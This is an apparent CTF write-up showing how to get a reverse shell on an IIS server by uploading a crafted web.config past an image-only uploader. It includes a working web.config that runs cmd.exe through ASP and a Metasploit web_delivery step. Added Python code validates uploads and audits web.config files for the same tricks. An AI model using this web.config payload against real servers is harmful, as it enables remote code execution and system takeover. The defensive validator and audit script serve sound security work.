Recently I have started doing CTFs, and there I have learned a lot of new stuff. This is one of them, which is quite easy but tricky. 😉
You have an uploader on an IIS server which accepts files only with the extension '.png' or '.jpg'.
If you try uploading files:
- with the extension '.png' or '.jpg', they will be uploaded.
- with the extension '.aspx' or '.asp', it will show an error like this, as they are not allowed to be uploaded.
- but if you try to upload a 'web.config', it will get uploaded 😉
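The check that should have refused the third case, as an added example that is not part of the original post: the uploader's real bug is that it only looks at the extension, so a reserved server filename with a non-image body gets through. This validator (hypothetical, written for this page) strips any path, rejects names IIS treats as configuration, allow-lists only '.png' and '.jpg', checks the file's magic bytes against the claimed type, and never stores the client's own filename. The allow-list and sample inputs are constructed for the example.

```python
import os
import re
import secrets

# Constructed allow-list: the extensions the page's uploader is supposed to accept,
# each paired with the magic bytes a genuine file of that type starts with.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
}

# Names IIS / ASP.NET interpret as configuration or application files no matter
# what directory they land in. Compared case-insensitively (NTFS is case-insensitive).
RESERVED_NAMES = {"web.config", "global.asa", "global.asax"}

# Only plain "name.ext": exactly one dot, so "shell.aspx.png", "a.png.",
# "a.png::$DATA" and anything containing a separator is rejected before the
# extension is even inspected.
SIMPLE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,8}")


class UploadRejected(ValueError):
    """Raised with a reason when an upload fails validation."""


def validate_upload(client_filename: str, content: bytes) -> str:
    """Validate an upload and return the random name it should be stored under.

    The client-supplied name is used only to learn the claimed type; it is never
    written to disk, so a crafted name cannot become a special file on the server.
    """
    # Strip any directory part, treating both separators as path separators.
    base = os.path.basename(client_filename.replace("\\", "/"))
    if base.lower() in RESERVED_NAMES:
        raise UploadRejected(f"reserved server filename: {base}")
    if not SIMPLE_NAME.fullmatch(base):
        raise UploadRejected(f"filename is not a simple name.ext: {base!r}")
    ext = os.path.splitext(base.lower())[1]
    magic = ALLOWED_TYPES.get(ext)
    if magic is None:
        raise UploadRejected(f"extension not allowed: {ext}")
    # The extension must agree with the bytes; an XML body named .png fails here.
    if not content.startswith(magic):
        raise UploadRejected(f"content is not a {ext} file")
    return secrets.token_hex(16) + ext


def is_rejected(client_filename: str, content: bytes) -> bool:
    """Convenience wrapper: True if the upload would be refused."""
    try:
        validate_upload(client_filename, content)
    except UploadRejected:
        return True
    return False


if __name__ == "__main__":
    # Constructed inputs mirroring the three cases listed above.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    print(validate_upload("cat.png", png))                      # stored under a random name
    print(is_rejected("shell.aspx", b"<%@ Page %>"))            # True: extension not allowed
    print(is_rejected("web.config", b"<?xml version='1.0'?>"))  # True: reserved name
```

The reserved-name check is defence in depth: even without it, 'web.config' fails the extension allow-list, and an image body renamed to 'web.config' fails the magic-byte check. Storing under a random name means the directory never contains a file whose name the server interprets.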
So you will ask what this 'web.config' is all about?
It is an XML-based configuration file which is used to set the rules and behaviour of specific directories. We can relate it to the '.htaccess' of Linux-based (Apache) servers, which is used for the same purpose.
Examples (rules and behaviour):
- Enable / disable firewall rules.
- Read / write permissions.
- Controlling database connection strings.
- Setting up error behavior and security measures.
Exploiting this vulnerability:
So we will try to get a reverse shell by uploading a crafted 'web.config'.
[STEP 1] SETTING UP THE LISTENER
We will use the Metasploit "web_delivery" module for it.
As we know that our target system is running IIS (i.e. Windows), we generate the PowerShell payload.
[STEP 2] UPLOADING WEB.CONFIG TO GET A REVERSE SHELL
In step 1 we got a PowerShell payload; now we have to put it into our web.config file. Below you can see the XML: save it as web.config and replace its "PAYLOAD" placeholder (the red section in the original) with the PowerShell payload.
CODE (web.config):
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!--
<% Response.write("-"&"->")
Response.write("Spider Sec")
Server.CreateObject("WSCRIPT.SHELL").exec("cmd.exe /c PAYLOAD ")
Response.write("<!-"&"-") %>
-->
Now execute the web.config by requesting it from the server.
Now you will get a Meterpreter session 🙂
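On the defending side, the same three ingredients the uploaded file relies on (a handler that maps '*.config' to an ISAPI script processor, request-filtering removals that make the file reachable, and ASP script hidden in an XML comment) are exactly what an audit of web.config files found in user-writable directories should flag. The script below is an added example, not part of the original post or of any IIS tooling: it parses a web.config, reports each suspicious element, and checks the raw text for script markers so code outside the root element is caught too. Both sample files are constructed for the example, PAYLOAD is a placeholder, and the "hardened" control shows a web.config an administrator would deliberately place in an upload folder.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample with the same shape as the uploaded web.config above:
# a handler mapping *.config to an ISAPI script processor, request-filtering
# removals, and a script block outside the root element. PAYLOAD is a placeholder.
MALICIOUS = r"""<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="x" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions><remove fileExtension=".config" /></fileExtensions>
        <hiddenSegments><remove segment="web.config" /></hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- <% Server.CreateObject("WSCRIPT.SHELL").exec("cmd.exe /c PAYLOAD") %> -->
"""

# Constructed control: a web.config an administrator places in an upload folder
# (read-only handler access, only the two image extensions served).
HARDENED = r"""<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read" />
    <security>
      <requestFiltering>
        <fileExtensions allowUnlisted="false">
          <add fileExtension=".png" allowed="true" />
          <add fileExtension=".jpg" allowed="true" />
        </fileExtensions>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
"""

SCRIPT_MARKER = re.compile(r"<%|%>")


def _child(element, tag):
    """Find a direct child by exact tag (system.webServer contains a dot, so avoid ElementPath)."""
    for child in element:
        if child.tag == tag:
            return child
    return None


def audit_web_config(text: str) -> list:
    """Return a list of finding labels for one web.config; an empty list means nothing suspicious."""
    findings = []
    # Raw-text check first: ASP script markers have no business in a config file, and
    # this catches code hidden inside comments or after the closing root element.
    if SCRIPT_MARKER.search(text):
        findings.append("inline-script-markers")
    root = ET.fromstring(text)
    web_server = _child(root, "system.webServer")
    if web_server is None:
        return findings
    handlers = _child(web_server, "handlers")
    if handlers is not None:
        policy = {p.strip().lower() for p in handlers.get("accessPolicy", "").split(",")}
        if policy & {"write", "execute"}:
            findings.append("handlers-accessPolicy-grants-write-or-execute")
        for add in handlers.findall("add"):
            # Any handler that hands requests to a script engine is suspect in an upload folder.
            if add.get("scriptProcessor") or add.get("modules") in ("IsapiModule", "CgiModule"):
                processor = add.get("scriptProcessor") or add.get("modules")
                findings.append(f"handler-maps-{add.get('path')}-to-{processor}")
    request_filtering = web_server.find("security/requestFiltering")
    if request_filtering is not None:
        for removed in request_filtering.findall("fileExtensions/remove"):
            findings.append(f"requestFiltering-unblocks-{removed.get('fileExtension')}")
        for removed in request_filtering.findall("hiddenSegments/remove"):
            findings.append(f"hiddenSegments-exposes-{removed.get('segment')}")
    return findings


if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS), ("hardened", HARDENED)):
        print(label, audit_web_config(sample))
```

A per-directory web.config can only override sections that applicationHost.config leaves unlocked, so locking the handlers section for the upload location (overrideMode="Deny") takes away the first ingredient; the audit is then a cheap way to confirm nothing in a writable folder is still trying to register one.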
Hope you guys will like it.
Follow us on Twitter: @SpiderSec